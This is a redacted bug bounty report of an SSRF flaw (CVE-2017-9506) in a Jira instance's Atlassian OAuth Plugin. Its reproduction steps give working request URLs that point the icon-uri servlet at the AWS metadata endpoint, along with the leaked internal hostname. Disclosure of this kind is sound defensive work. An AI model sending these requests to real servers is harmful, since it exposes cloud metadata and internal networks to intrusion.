SSRF on █████████ Allowing internal server data access

**Summary:** An end point on ██████ allows an internal access to the network thus revealing sensitive data and allowing internal tunneling **Description:** OAuth Plugin allows you to provide a url that gives a snap shot of the web page. We can pass internal URLS and conduct SSRF. ## Impact Critical ## Step-by-step Reproduction Instructions https://███████/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/hostname We can see the follow data ip-172-31-12-254.█████████.compute.internal https://████████/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/public-ipv4 ███████ ## Product, Version, and Configuration (If applicable) Jira ## Suggested Mitigation/Remediation Actions Update to recent version ## Impact An attacker can tunnel into internal networks and access sensitive internal data such as AWS meta data information. The hacker selected the **Server-Side Request Forgery (SSRF)** weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers: **Can internal services be reached bypassing network access control?** Yes **What internal services were accessible?** AWS Bucket Meta data **Security Impact** CVE-2017-9506 - The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).